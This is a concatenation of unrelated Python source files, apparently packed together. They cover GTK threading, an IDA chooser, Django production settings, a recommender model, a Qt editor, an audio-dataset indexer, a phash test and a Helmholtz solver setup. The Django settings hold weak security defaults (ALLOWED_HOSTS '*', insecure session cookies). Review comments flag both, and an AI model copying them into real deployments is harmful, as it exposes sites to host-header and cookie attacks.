        # You can pass in a logger if you prefer to do so
        if logger == None:
            logger = logging.getLogger('GtkHelper')
        self.logger = logger
        if not ev_quit:
            ev_quit = threading.Event()
        self.ev_quit = ev_quit
        
        self.gui_thread_id = None
        
    def update_pending(self, timeout=0.0):
        """Process all pending GTK events and return.  _timeout_ is a tuning
        parameter for performance.
        """
        # Process "out-of-band" GTK events
        try:
            while gtk.events_pending():
                #gtk.main_iteration(False)
                gtk.main_iteration()
        finally:
            pass

        done = False
        while not done:
            # Process "in-band" GTK events
            try:
                future = self.gui_queue.get(block=True, 
                                            timeout=timeout)

                # Execute the GUI method
                try:
                    try:
                        res = future.thaw(suppress_exception=False)

                    except Exception, e:
                        future.resolve(e)

                        self.logger.error("gui error: %s" % str(e))
                        try:
                            (type, value, tb) = sys.exc_info()
                            tb_str = "".join(traceback.format_tb(tb))
                            self.logger.error("Traceback:\n%s" % (tb_str))

                        except Exception, e:
                            self.logger.error("Traceback information unavailable.")

                finally:
                    pass

                    
            except que.Empty:
                done = True
                
            except Exception, e:
                self.logger.error("Main GUI loop error: %s" % str(e))
                
        # Process "out-of-band" GTK events again
        try:
            while gtk.events_pending():
                #gtk.main_iteration(False)
                gtk.main_iteration()
        finally:
            pass

    def gui_do(self, method, *args, **kwdargs):
        """General method for asynchronously calling into the GUI.
        It makes a future to call the given (method) with the given (args)
        and (kwdargs) inside the gui thread.  If the calling thread is a
        non-gui thread the future is returned.
        """
        future = Future.Future()
        future.freeze(method, *args, **kwdargs)
        self.gui_queue.put(future)

        my_id = thread.get_ident() 
        if my_id != self.gui_thread_id:
            return future
   
    def gui_call(self, method, *args, **kwdargs):
        """General method for synchronously calling into the GUI.
        This waits until the method has completed before returning.
        """
        my_id = thread.get_ident() 
        if my_id == self.gui_thread_id:
            return method(*args, **kwdargs)
        else:
            future = self.gui_do(method, *args, **kwdargs)
            return future.wait()
   
    def gui_do_future(self, future):
        self.gui_queue.put(future)
        return future

    def nongui_do(self, method, *args, **kwdargs):
        task = Task.FuncTask(method, args, kwdargs, logger=self.logger)
        return self.nongui_do_task(task)
   
    def nongui_do_cb(self, tup, method, *args, **kwdargs):
        task = Task.FuncTask(method, args, kwdargs, logger=self.logger)
        task.register_callback(tup[0], args=tup[1:])
        return self.nongui_do_task(task)
   
    def nongui_do_future(self, future):
        task = Task.FuncTask(future.thaw, (), {}, logger=self.logger)
        return self.nongui_do_task(task)
   
    def nongui_do_task(self, task):
        try:
            task.init_and_start(self)
            return task
        except Exception, e:
            self.logger.error("Error starting task: %s" % (str(e)))
            raise(e)

    def assert_gui_thread(self):
        my_id = thread.get_ident() 
        assert my_id == self.gui_thread_id, \
               Exception("Non-GUI thread (%d) is executing GUI code!" % (
            my_id))
        
    def assert_nongui_thread(self):
        my_id = thread.get_ident() 
        assert my_id != self.gui_thread_id, \
               Exception("GUI thread (%d) is executing non-GUI code!" % (
            my_id))
        
    def mainloop(self, timeout=0.001):
        # Mark our thread id
        self.gui_thread_id = thread.get_ident()

        while not self.ev_quit.isSet():
            self.update_pending(timeout=timeout)

    def gui_quit(self):
        "Call this to cause the GUI thread to quit the mainloop."""
        self.ev_quit.set()
        

# END

# coding: utf-8
# This file is part of Thomas Aquinas.
#
# Thomas Aquinas is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Thomas Aquinas is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Thomas Aquinas.  If not, see <http://www.gnu.org/licenses/>.
#
#                       veni, Sancte Spiritus.

import ctypes
import logging


#<pycode(py_choose)>
class Choose:
  """
  Choose - class for choose() with callbacks

  Subclass and override the callback methods (sizer, getl, enter, ...);
  choose() hands this object to the IDA kernel, which calls back into it
  to populate and react to the list dialog.
  """
  def __init__(self, list, title, flags=0, deflt=1, icon=37):
    # NOTE(review): 'list' shadows the builtin, but it is part of the
    # public keyword interface, so it is left unchanged.
    self.list = list
    self.title = title

    self.flags = flags
    # Dialog geometry; -1 lets the kernel pick defaults.
    self.x0 = -1
    self.x1 = -1
    self.y0 = -1
    self.y1 = -1

    self.width = -1
    # Default selection (1-based item index) and icon id.
    self.deflt = deflt
    self.icon = icon

    # HACK: Add a circular reference for non-modal choosers. This prevents the GC
    # from collecting the class object the callbacks need. Unfortunately this means
    # that the class will never be collected, unless refhack is set to None explicitly.
    # NOTE(review): Choose2 is expected from the embedding IDA runtime --
    # it is not defined in this module.
    if (flags & Choose2.CH_MODAL) == 0:
      self.refhack = self

  def sizer(self):
    """
    Callback: sizer - returns the length of the list
    """
    return len(self.list)

  def getl(self, n):
    """
    Callback: getl - get one item from the list

    n == 0 requests the title; items themselves are 1-based.
    """
    if n == 0:
       return self.title
    if n <= self.sizer():
      return str(self.list[n-1])
    else:
      return "<Empty>"


  def ins(self):
    # Callback: insert a new item (no-op by default).
    pass


  def update(self, n):
    # Callback: refresh item n (no-op by default).
    pass


  def edit(self, n):
    # Callback: edit item n (no-op by default).
    pass


  def enter(self, n):
    # Callback: item n was activated (e.g. double-clicked).
    print "enter(%d) called" % n


  def destroy(self):
    # Callback: the chooser window is being closed (no-op by default).
    pass


  def get_icon(self, n):
    # Callback: icon id for item n (default icon when None).
    pass


  def choose(self):
    """
    choose - Display the choose dialogue

    Returns whatever _idaapi.choose_choose() returns.
    """
    # Disable the script timeout while the dialog is up, restoring the
    # previous value afterwards.
    # NOTE(review): set_script_timeout and _idaapi come from the IDA
    # runtime, not this module.
    old = set_script_timeout(0)
    n = _idaapi.choose_choose(
        self,
        self.flags,
        self.x0,
        self.y0,
        self.x1,
        self.y1,
        self.width,
        self.deflt,
        self.icon)
    set_script_timeout(old)
    return n
#</pycode(py_choose)>

# -*- coding: utf-8 -*-
'''
Production Configurations

- Use djangosecure
- Use Amazon's S3 for storing static files and uploaded media
- Use sendgrid to send emails
- Use MEMCACHIER on Heroku
'''
from configurations import values

# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
try:
    from S3 import CallingFormat
    AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN
except ImportError:
    # TODO: Fix this where even if in Dev this class is called.
    pass

from .common import Common


class Production(Common):
    """Production settings layered on Common: django-secure hardening,
    S3 storage for static/media files, sendgrid email and memcached
    caching (Heroku-oriented)."""

    # This ensures that Django will be able to detect a secure connection
    # properly on Heroku.
    SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')

    # INSTALLED_APPS
    INSTALLED_APPS = Common.INSTALLED_APPS
    # END INSTALLED_APPS

    # SECRET KEY
    # Required secret supplied via the environment (values.SecretValue).
    SECRET_KEY = values.SecretValue()
    # END SECRET KEY

    # django-secure
    INSTALLED_APPS += ("djangosecure", )

    # set this to 60 seconds and then to 518400 when you can prove it works
    SECURE_HSTS_SECONDS = 60
    SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True)
    SECURE_FRAME_DENY = values.BooleanValue(True)
    SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True)
    SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True)
    # NOTE(review): secure session cookies default to off here -- confirm
    # this is intentional for production.
    SESSION_COOKIE_SECURE = values.BooleanValue(False)
    SESSION_COOKIE_HTTPONLY = values.BooleanValue(True)
    SECURE_SSL_REDIRECT = values.BooleanValue(True)
    # end django-secure

    # SITE CONFIGURATION
    # Hosts/domain names that are valid for this site
    # See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
    # NOTE(review): "*" accepts any Host header; consider restricting to
    # the real domain(s).
    ALLOWED_HOSTS = ["*"]
    # END SITE CONFIGURATION

    INSTALLED_APPS += ("gunicorn", )

    # STORAGE CONFIGURATION
    # See: http://django-storages.readthedocs.org/en/latest/index.html
    INSTALLED_APPS += (
        'storages',
    )

    # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
    # Static files and uploaded media both go to the same S3 backend.
    STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'

    # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
    AWS_ACCESS_KEY_ID = values.SecretValue()
    AWS_SECRET_ACCESS_KEY = values.SecretValue()
    AWS_STORAGE_BUCKET_NAME = values.SecretValue()
    AWS_AUTO_CREATE_BUCKET = True
    AWS_QUERYSTRING_AUTH = False

    # see: https://github.com/antonagestam/collectfast
    AWS_PRELOAD_METADATA = True
    INSTALLED_APPS += ('collectfast', )

    # AWS cache settings, don't change unless you know what you're doing:
    # One week, in seconds.
    AWS_EXPIRY = 60 * 60 * 24 * 7
    AWS_HEADERS = {
        'Cache-Control': 'max-age=%d, s-maxage=%d, must-revalidate' % (
            AWS_EXPIRY, AWS_EXPIRY)
    }

    # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
    STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
    # END STORAGE CONFIGURATION

    # EMAIL
    DEFAULT_FROM_EMAIL = values.Value('tco2 <noreply@example.com>')
    EMAIL_HOST = values.Value('smtp.sendgrid.com')
    EMAIL_HOST_PASSWORD = values.SecretValue(environ_prefix="", environ_name="SENDGRID_PASSWORD")
    EMAIL_HOST_USER = values.SecretValue(environ_prefix="", environ_name="SENDGRID_USERNAME")
    EMAIL_PORT = values.IntegerValue(587, environ_prefix="", environ_name="EMAIL_PORT")
    EMAIL_SUBJECT_PREFIX = values.Value('[tco2] ', environ_name="EMAIL_SUBJECT_PREFIX")
    EMAIL_USE_TLS = True
    SERVER_EMAIL = EMAIL_HOST_USER
    # END EMAIL

    # TEMPLATE CONFIGURATION
    # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
    # The cached loader compiles each template only once per process.
    TEMPLATE_LOADERS = (
        ('django.template.loaders.cached.Loader', (
            'django.template.loaders.filesystem.Loader',
            'django.template.loaders.app_directories.Loader',
        )),
    )
    # END TEMPLATE CONFIGURATION

    # CACHING
    # Only do this here because thanks to django-pylibmc-sasl and pylibmc
    # memcacheify is painful to install on windows.
    try:
        # See: https://github.com/rdegges/django-heroku-memcacheify
        from memcacheify import memcacheify
        CACHES = memcacheify()
    except ImportError:
        # Fall back to a local memcached instance when memcacheify is absent.
        CACHES = values.CacheURLValue(default="memcached://127.0.0.1:11211")
    # END CACHING

    # Your production stuff: Below this line define 3rd party library settings

# Author: Immanuel Bayer
# License: BSD 3 clause

import ffm
import numpy as np
from .base import FactorizationMachine
from sklearn.utils.testing import assert_array_equal
from .validation import check_array, assert_all_finite


class FMRecommender(FactorizationMachine):

    """ Factorization Machine Recommender with pairwise (BPR) loss solver.

    Parameters
    ----------
    n_iter : int, optional
        The number of iterations over individual samples.

    init_stdev: float, optional
        Sets the stdev for the initialization of the parameter

    random_state: int, optional
        The seed of the pseudo random number generator that
        initializes the parameters and mcmc chain.

    rank: int
        The rank of the factorization used for the second order interactions.

    l2_reg_w : float
        L2 penalty weight for linear coefficients.

    l2_reg_V : float
        L2 penalty weight for pairwise (second order) coefficients.

    l2_reg : float
        L2 penalty weight for all coefficients (default=0).
        If nonzero, it overrides both l2_reg_w and l2_reg_V.

    step_size : float
        Stepsize for the SGD solver, the solver uses a fixed step size and
        might require a tuning of the number of iterations `n_iter`.

    Attributes
    ----------

    w0_ : float
        bias term

    w_ : float | array, shape = (n_features)
        Coefficients for linear combination.

    V_ : float | array, shape = (rank_pair, n_features)
        Coefficients of second order factor matrix.
    """

    def __init__(self, n_iter=100, init_stdev=0.1, rank=8, random_state=123,
                 l2_reg_w=0.1, l2_reg_V=0.1, l2_reg=0, step_size=0.1):
        super(FMRecommender, self).\
            __init__(n_iter=n_iter, init_stdev=init_stdev, rank=rank,
                     random_state=random_state)
        # A nonzero blanket l2_reg takes precedence over the individual
        # penalties.  (DOC FIX: the l2_reg_w / l2_reg_V descriptions were
        # swapped relative to the w_ / V_ attributes they regularize.)
        if l2_reg != 0:
            self.l2_reg_V = l2_reg
            self.l2_reg_w = l2_reg
        else:
            self.l2_reg_w = l2_reg_w
            self.l2_reg_V = l2_reg_V
        self.step_size = step_size
        self.task = "ranking"

    def fit(self, X, pairs):
        """ Fit model with specified loss.

        Parameters
        ----------
        X : scipy.sparse.csc_matrix, (n_samples, n_features)

        pairs : ndarray, shape = (n_compares, 2)
                Each row `i` defines a pair of samples such that
                the first returns a higher value than the second:
                FM(X[pairs[i, 0]]) > FM(X[pairs[i, 1]]).
        """
        # The solver expects features x samples, hence the transpose.
        X = X.T
        X = check_array(X, accept_sparse="csc", dtype=np.float64)
        assert_all_finite(pairs)

        pairs = pairs.astype(np.float64)
        # check that pairs contain no real values
        assert_array_equal(pairs, pairs.astype(np.int32))
        # Pair entries must be valid sample indices (columns of X.T).
        assert pairs.max() <= X.shape[1]
        assert pairs.min() >= 0
        self.w0_, self.w_, self.V_ = ffm.ffm_fit_sgd_bpr(self, X, pairs)
        return self

#------------------------------------------------------------------------------
# Copyright (c) 2007, Riverbank Computing Limited
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD license.
# However, when used with the GPL version of PyQt the additional terms described in the PyQt GPL exception also apply

#
# Author: Riverbank Computing Limited
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------


# Standard library imports.
import sys

# Major package imports.
from pyface.qt import QtCore, QtGui

# Enthought library imports.
from traits.api import Bool, Event, provides, Unicode

# Local imports.
from pyface.i_python_editor import IPythonEditor, MPythonEditor
from pyface.key_pressed_event import KeyPressedEvent
from pyface.widget import Widget
from pyface.ui.qt4.code_editor.code_widget import AdvancedCodeWidget


@provides(IPythonEditor)
class PythonEditor(MPythonEditor, Widget):
    """ The toolkit specific implementation of a PythonEditor.  See the
    IPythonEditor interface for the API documentation.
    """

    #### 'IPythonEditor' interface ############################################

    # Whether the buffer has unsaved modifications.
    dirty = Bool(False)

    # Path of the file being edited.
    path = Unicode

    show_line_numbers = Bool(True)

    #### Events ####

    # Fired whenever the document text changes.
    changed = Event

    key_pressed = Event(KeyPressedEvent)

    ###########################################################################
    # 'object' interface.
    ###########################################################################

    def __init__(self, parent, **traits):
        """ Create the editor and its toolkit control under *parent*. """
        super(PythonEditor, self).__init__(**traits)
        self.control = self._create_control(parent)

    ###########################################################################
    # 'PythonEditor' interface.
    ###########################################################################

    def load(self, path=None):
        """ Loads the contents of the editor.
        """
        if path is None:
            path = self.path

        # We will have no path for a new script.
        if len(path) > 0:
            # BUG FIX: read from the requested 'path' (the original read
            # self.path, silently ignoring the argument) and close the
            # file even if read() raises.
            with open(path, 'r') as f:
                text = f.read()
        else:
            text = ''

        self.control.code.setPlainText(text)
        self.dirty = False

    def save(self, path=None):
        """ Saves the contents of the editor.
        """
        if path is None:
            path = self.path

        # 'with' guarantees the file is flushed and closed on error.
        with open(path, 'w') as f:
            f.write(self.control.code.toPlainText())

        self.dirty = False

    def select_line(self, lineno):
        """ Selects the specified line.
        """
        self.control.code.set_line_column(lineno, 0)
        self.control.code.moveCursor(QtGui.QTextCursor.EndOfLine,
                                     QtGui.QTextCursor.KeepAnchor)

    ###########################################################################
    # Trait handlers.
    ###########################################################################

    def _path_changed(self):
        self._changed_path()

    def _show_line_numbers_changed(self):
        if self.control is not None:
            self.control.code.line_number_widget.setVisible(
                self.show_line_numbers)
            self.control.code.update_line_number_width()

    ###########################################################################
    # Private interface.
    ###########################################################################

    def _create_control(self, parent):
        """ Creates the toolkit-specific control for the widget.
        """
        self.control = control = AdvancedCodeWidget(parent)
        self._show_line_numbers_changed()

        # Install event filter to trap key presses.
        event_filter = PythonEditorEventFilter(self, self.control)
        self.control.installEventFilter(event_filter)
        self.control.code.installEventFilter(event_filter)

        # Connect signals for text changes.
        control.code.modificationChanged.connect(self._on_dirty_changed)
        control.code.textChanged.connect(self._on_text_changed)

        # Load the editor's contents.
        self.load()

        return control

    def _on_dirty_changed(self, dirty):
        """ Called whenever a change is made to the dirty state of the
            document.
        """
        self.dirty = dirty

    def _on_text_changed(self):
        """ Called whenever a change is made to the text of the document.
        """
        self.changed = True


class PythonEditorEventFilter(QtCore.QObject):
    """ A thin wrapper around the advanced code widget to handle the key_pressed
        Event.
    """

    def __init__(self, editor, parent):
        """ Remember the editor whose key_pressed trait we must fire. """
        super(PythonEditorEventFilter, self).__init__(parent)
        self.__editor = editor

    def eventFilter(self, obj, event):
        """ Reimplemented to trap key presses.
        """
        if self.__editor.control and obj == self.__editor.control and \
               event.type() == QtCore.QEvent.FocusOut:
            # Hack for Traits UI compatibility.
            self.__editor.control.emit(QtCore.SIGNAL('lostFocus'))

        elif self.__editor.control and obj == self.__editor.control.code and \
               event.type() == QtCore.QEvent.KeyPress:
            # Pyface doesn't seem to be Unicode aware.  Only keep the key code
            # if it corresponds to a single Latin1 character.
            kstr = event.text()
            try:
                kcode = ord(str(kstr))
            except (TypeError, ValueError):
                # Empty / multi-char / non-Latin1 text: no single key code.
                kcode = 0

            mods = event.modifiers()
            # BUG FIX: fire the event on the editor, which declares the
            # key_pressed trait; the original assigned to an attribute of
            # this filter, so listeners on the editor never saw it.
            self.__editor.key_pressed = KeyPressedEvent(
                alt_down     = ((mods & QtCore.Qt.AltModifier) ==
                                QtCore.Qt.AltModifier),
                control_down = ((mods & QtCore.Qt.ControlModifier) ==
                                QtCore.Qt.ControlModifier),
                shift_down   = ((mods & QtCore.Qt.ShiftModifier) ==
                                QtCore.Qt.ShiftModifier),
                key_code     = kcode,
                event        = event)

        return super(PythonEditorEventFilter, self).eventFilter(obj, event)

import argparse
import glob
import hashlib
import json
import os


# Destination paths of the generated index files.
IRMAS_INDEX_PATH = '../mirdata/indexes/irmas_index.json'
# BUG FIX: make_irmas_test_index() writes to IRMAS_TEST_INDEX_PATH, which
# was never defined in this module (NameError at runtime).  The sibling
# path below is the conventional choice -- TODO confirm against the
# mirdata indexes folder.
IRMAS_TEST_INDEX_PATH = '../mirdata/indexes/irmas_test_index.json'


def md5(file_path):
    """Get md5 hash of a file.
    Parameters
    ----------
    file_path: str
        File path.
    Returns
    -------
    md5_hash: str
        md5 hash of data in file_path
    """
    digest = hashlib.md5()
    # Stream the file in fixed-size chunks so large files do not have to
    # fit in memory.
    with open(file_path, 'rb') as stream:
        chunk = stream.read(4096)
        while chunk:
            digest.update(chunk)
            chunk = stream.read(4096)
    return digest.hexdigest()


def strip_first_dir(full_path):
    """Return *full_path* with its leading directory component removed."""
    components = full_path.split(os.path.sep)
    return os.path.join(*components[1:])


def make_irmas_index(irmas_data_path, index_path=None):
    """Build the IRMAS training + testing index and write it as JSON.

    Parameters
    ----------
    irmas_data_path: str
        Path to the IRMAS data folder.
    index_path: str, optional
        Where to write the JSON index; defaults to IRMAS_INDEX_PATH.
    """
    if index_path is None:
        index_path = IRMAS_INDEX_PATH

    # --- training split: one entry per .wav, keyed by the id embedded in
    # the bracketed filename fields.
    irmas_dict = dict()
    for root, dirs, files in os.walk(irmas_data_path):
        for directory in dirs:
            if 'Train' not in directory:
                continue
            for root_, dirs_, files_ in os.walk(
                os.path.join(irmas_data_path, directory)
            ):
                for directory_ in dirs_:
                    for root__, dirs__, files__ in os.walk(
                        os.path.join(irmas_data_path, directory, directory_)
                    ):
                        for file in files__:
                            if not file.endswith('.wav'):
                                continue
                            # 'dru'/'nod' filenames carry an extra bracketed
                            # field, so their id sits after the 4th ']'
                            # instead of the 3rd.
                            # BUG FIX: the original used if/if/else, so
                            # 'dru' files also fell through to the else
                            # branch and were re-indexed under the wrong
                            # id field.
                            if 'dru' in file or 'nod' in file:
                                irmas_id = file.split(']')[3]
                            else:
                                irmas_id = file.split(']')[2]
                            track_id = irmas_id.split('.')[0]  # drop '.wav'
                            irmas_dict[track_id] = os.path.join(
                                directory, directory_, file
                            )

    # --- testing split: numbered (audio, annotation) pairs.
    count = 0
    irmas_test_dict = dict()
    for root, dirs, files in os.walk(irmas_data_path):
        for directory in dirs:
            if 'Test' not in directory:
                continue
            for root_, dirs_, files_ in os.walk(
                os.path.join(irmas_data_path, directory)
            ):
                for directory_ in dirs_:
                    for root__, dirs__, files__ in os.walk(
                        os.path.join(irmas_data_path, directory, directory_)
                    ):
                        for file in files__:
                            if not file.endswith('.wav'):
                                continue
                            file_name = os.path.join(
                                directory, directory_, file
                            )
                            # Sibling .txt annotation of the audio file.
                            track_name = str(file_name.split('.wa')[0]) + '.txt'
                            irmas_test_dict[count] = [file_name, track_name]
                            count += 1

    irmas_index = {}
    # Training tracks: the filename itself encodes the labels, so the
    # audio path doubles as the annotation entry.
    for track_id, rel_path in sorted(irmas_dict.items()):
        audio_checksum = md5(os.path.join(irmas_data_path, rel_path))
        irmas_index[track_id] = {
            'audio': (rel_path, audio_checksum),
            'annotation': (rel_path, audio_checksum),
        }

    # Testing tracks are keyed by a 1-based running integer.
    index = 1
    for file_name, track_name in irmas_test_dict.values():
        audio_checksum = md5(os.path.join(irmas_data_path, file_name))
        annotation_checksum = md5(os.path.join(irmas_data_path, track_name))

        irmas_index[index] = {
            'audio': (file_name, audio_checksum),
            'annotation': (track_name, annotation_checksum),
        }
        index += 1

    with open(index_path, 'w') as fhandle:
        json.dump(irmas_index, fhandle, indent=2)


def make_irmas_test_index(irmas_data_path, index_path=None):
    """Build an index of the IRMAS testing split and write it as JSON.

    Parameters
    ----------
    irmas_data_path: str
        Path to the IRMAS data folder.
    index_path: str, optional
        Where to write the JSON index.  BUG FIX: the original wrote to
        IRMAS_TEST_INDEX_PATH, a name never defined in this module
        (NameError at runtime); a literal default is provided instead.
    """
    if index_path is None:
        index_path = '../mirdata/indexes/irmas_test_index.json'

    count = 1
    irmas_dict = dict()
    for root, dirs, files in os.walk(irmas_data_path):
        for directory in dirs:
            if 'Test' not in directory:
                continue
            for root_, dirs_, files_ in os.walk(
                os.path.join(irmas_data_path, directory)
            ):
                for directory_ in dirs_:
                    for root__, dirs__, files__ in os.walk(
                        os.path.join(irmas_data_path, directory, directory_)
                    ):
                        for file in files__:
                            if not file.endswith('.wav'):
                                continue
                            # Audio file plus its sibling .txt annotation.
                            file_name = os.path.join(
                                directory, directory_, file
                            )
                            track_name = str(file_name.split('.wa')[0]) + '.txt'
                            irmas_dict[count] = [file_name, track_name]
                            count += 1

    irmas_index = {}
    index = 1
    for file_name, track_name in irmas_dict.values():
        audio_checksum = md5(os.path.join(irmas_data_path, file_name))
        annotation_checksum = md5(os.path.join(irmas_data_path, track_name))

        irmas_index[index] = {
            'audio': (file_name, audio_checksum),
            'annotation': (track_name, annotation_checksum),
        }
        index += 1

    with open(index_path, 'w') as fhandle:
        json.dump(irmas_index, fhandle, indent=2)


def main(args):
    """Build the IRMAS index for the dataset folder given on the CLI."""
    # Only the training/testing combined index is generated here; the
    # standalone test-index builder is kept for reference.
    make_irmas_index(args.irmas_data_path)
    # make_irmas_test_index(args.irmas_data_path)


if __name__ == '__main__':
    # Command-line entry point: one positional argument giving the
    # location of the IRMAS data folder.
    PARSER = argparse.ArgumentParser(description='Make IRMAS index file.')
    PARSER.add_argument('irmas_data_path', type=str, help='Path to IRMAS data folder.')

    main(PARSER.parse_args())


import unittest
import time
import pprint
import logging
import scanner.logSetup as logSetup

import pyximport
print("Have Cython")
pyximport.install()

import dbPhashApi




class TestCompareDatabaseInterface(unittest.TestCase):
	"""Cross-check the two phash lookup paths of PhashDbApi.

	For sampled rows, the direct database query and the in-memory tree
	query must return identical id sets at every distance threshold.
	"""

	def __init__(self, *args, **kwargs):
		logSetup.initLogging()
		super().__init__(*args, **kwargs)

	def setUp(self):
		# We set up and tear down the tree a few times to validate the dropTree function
		self.log = logging.getLogger("Main.TestCompareDatabaseInterface")

		self.tree = dbPhashApi.PhashDbApi()
		# Rebuild the in-memory structure from the database.
		self.tree.forceReload()

	def dist_check(self, distance, dbid, phash):
		# Query both implementations, timing each one separately.

		qtime1 = time.time()
		have1 = self.tree.getWithinDistance_db(phash, distance=distance)
		qtime2 = time.time()
		qtime3 = time.time()
		have2 = self.tree.getIdsWithinDistance(phash, distance=distance)
		qtime4 = time.time()


		# print(dbid, have1)
		# On mismatch, dump both result sets before the assertions fire.
		if have1 != have2:
			self.log.error("Mismatch!")
			for line in pprint.pformat(have1).split("\n"):
				self.log.error(line)
			for line in pprint.pformat(have2).split("\n"):
				self.log.error(line)

		# The probe row itself must be found by both paths, and the
		# full result sets must agree.
		self.assertTrue(dbid in have1)
		self.assertTrue(dbid in have2)
		self.assertEqual(have1, have2)

		self.log.info('Dist %s %s, %s', distance, qtime2-qtime1, qtime4-qtime3)


	def test_0(self):
		# Sample random rows (0.001 is presumably a sampling fraction --
		# confirm against PhashDbApi.getRandomPhashRows).
		rand_r = self.tree.getRandomPhashRows(0.001)
		self.log.info("Have %s items to test with", len(rand_r))

		stepno = 0
		for dbid, phash in rand_r:
			# Check agreement at every distance threshold from 1 to 8.
			self.dist_check(1, dbid, phash)
			self.dist_check(2, dbid, phash)
			self.dist_check(3, dbid, phash)
			self.dist_check(4, dbid, phash)
			self.dist_check(5, dbid, phash)
			self.dist_check(6, dbid, phash)
			self.dist_check(7, dbid, phash)
			self.dist_check(8, dbid, phash)
			stepno += 1
			self.log.info("On step %s of %s", stepno, len(rand_r))

from numpy import array, zeros, ones, sqrt, ravel, mod, random, inner, conjugate
from scipy.sparse import csr_matrix, csc_matrix, coo_matrix, bmat, eye
from scipy import rand, mat, real, imag, linspace, hstack, vstack, exp, cos, sin, pi
from pyamg.util.linalg import norm
import pyamg
from scipy.optimize import fminbound, fmin

__all__ = ['one_D_helmholtz', 'min_wave']

def min_wave(A, omega, x, tol=1e-5, maxiter=25):
    '''Find the wavenumber shift of numerically lowest energy for A.

    parameters
    ----------
    A {matrix}
        1D Helmholtz Operator
    omega {scalar}
        Wavenumber used to discretize Helmholtz problem
    x {array}
        1D mesh for the problem
    tol {scalar}
        minimization tolerance
    maxiter {integer}
        maximum iters for minimization algorithm

    returns
    -------
    shift {scalar}
        The omega shift that minimizes ||A c|| / ||c|| for the trial
        wave c = cos((omega + shift) * x), i.e. the numerically lowest
        energy wavenumber for the matrix A.

    '''
    x = ravel(x)

    # Scalar objective: relative energy of the trial wave, ignoring the
    # boundaries by only considering A*c at [1:-1]
    def obj_fcn(alpha):
        c = cos((omega + alpha) * x)
        Ac = (A * c)[1:-1]
        return norm(Ac) / norm(c[1:-1])

    # Bounded scalar search over shifts in (-0.99*omega, 0.99*omega);
    # disp=0 silences fminbound's convergence printout.
    (xopt, fval, ierr, numfunc) = fminbound(
        obj_fcn, -0.99 * omega, 0.99 * omega,
        xtol=tol, maxfun=maxiter, full_output=True, disp=0)

    return xopt

def one_D_helmholtz(h, omega=1.0, nplane_waves=2):
    '''Build a 1-D Helmholtz system with radiation BCs and plane-wave modes.

    parameters
    ----------
    h {int}
        Number of grid points for the 1-D Helmholtz problem
        (the code uses mesh spacing 1/(h-1))
    omega {float}
        Defines Helmholtz wave number
    nplane_waves {int}
        Defines the number of planewaves used for the near null-space modes, B.
        1: B = [ exp(ikx) ]
        2: B = [ real(exp(ikx)), complex(exp(ikx)) ]

    returns
    -------
    dictionary containing:

    A {matrix-like}
        LHS of linear system for Helmholtz problem,
        -laplace(u) - omega^2 u = f
    B {array}
        near null-space modes (plane waves at the energy-minimizing shift)
    mesh_h {float}
        mesh size
    vertices {array-like}
        [X, Y]
    elements {None}
        None, just using 1-D finite-differencing

    '''

    # Ensure Repeatability of "random" initial guess
    random.seed(10)

    # Mesh Spacing
    # NOTE(review): vertices below span [-1, 1], whose spacing is
    # 2/(h-1), not 1/(h-1) — confirm which is intended.
    mesh_h = 1.0/(float(h)-1.0)

    # Construct Real Operator: scaled Laplacian minus (omega*h)^2 * I
    reA = pyamg.gallery.poisson( (h,), format='csr')
    reA = reA - mesh_h*mesh_h*omega*omega*\
          eye(reA.shape[0], reA.shape[1], format='csr')
    dimen = reA.shape[0]

    # Construct Imaginary Operator: single nonzero at entry (0, 0)
    imA = csr_matrix( coo_matrix( (array([2.0*mesh_h*omega]), \
                    (array([0]), array([0]))), shape=reA.shape) )

    # Enforce Radiation Boundary Conditions at first grid point
    # NOTE(review): relies on the CSR data ordering produced by
    # pyamg.gallery.poisson (data[1] is the first off-diagonal of row 0).
    reA.data[1] = -2.0

    # In order to maintain symmetry scale the first equation by 1/2
    reA.data[0] = 0.5*reA.data[0]
    reA.data[1] = 0.5*reA.data[1]
    imA.data[0] = 0.5*imA.data[0]

    # Create complex-valued system
    complexA = reA + 1.0j*imA

    # For this case, the CG (continuous Galerkin) case is the default elements and vertices
    # because there is no DG mesh to speak of
    elements = None
    vertices = hstack((linspace(-1.0,1.0,h).reshape(-1,1), zeros((h,1))))

    # Near null-space modes are 1-D Plane waves: [exp(ikx), i exp(ikx)]
    # with the wavenumber shifted to the numerically lowest-energy value.
    B = zeros( (dimen, nplane_waves), dtype=complex )
    shift = min_wave(complexA, omega, vertices[:,0], tol=1e-9, maxiter=15)
    if nplane_waves == 1:
        B[:,0] = exp(1.0j*(omega+shift)*vertices[:,0])
    elif nplane_waves == 2:
        B[:,0] = cos((omega+shift)*vertices[:,0])
        B[:,1] = sin((omega+shift)*vertices[:,0])

    return {'A' : complexA, 'B' : B, 'mesh_h' : mesh_h, \
            'elements' : elements, 'vertices' : vertices}




from bluebottle.projects.serializers import ProjectPreviewSerializer
from bluebottle.quotes.serializers import QuoteSerializer
from bluebottle.slides.serializers import SlideSerializer
from bluebottle.statistics.serializers import StatisticSerializer
from rest_framework import serializers


class HomePageSerializer(serializers.Serializer):
    """Aggregate serializer for the home-page payload.

    Bundles quotes, slides, statistics and project previews — each a
